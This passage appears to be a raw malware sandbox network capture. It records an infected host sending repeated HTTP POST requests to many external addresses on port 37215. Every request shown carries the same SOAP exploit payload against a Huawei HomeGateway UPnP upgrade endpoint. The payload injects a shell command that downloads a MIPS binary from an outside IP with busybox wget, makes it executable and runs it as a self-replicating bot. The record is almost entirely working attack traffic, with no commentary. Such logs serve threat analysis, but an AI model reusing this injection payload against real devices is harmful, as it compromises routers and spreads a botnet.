                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1741192.168.2.1336828157.171.54.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618782043 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1742192.168.2.133342265.105.124.14237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618793011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1743192.168.2.1340576157.157.140.11837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618822098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1744192.168.2.134531841.184.171.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618839025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1745192.168.2.1349060157.156.228.3337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618849039 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1746192.168.2.1355214157.202.239.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618866920 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1747192.168.2.1345898124.113.140.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.618866920 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1748192.168.2.134394441.8.49.18237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.628396034 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1749192.168.2.1359020157.46.33.3737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.628401041 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1750192.168.2.1355736157.134.35.9237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.628834009 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 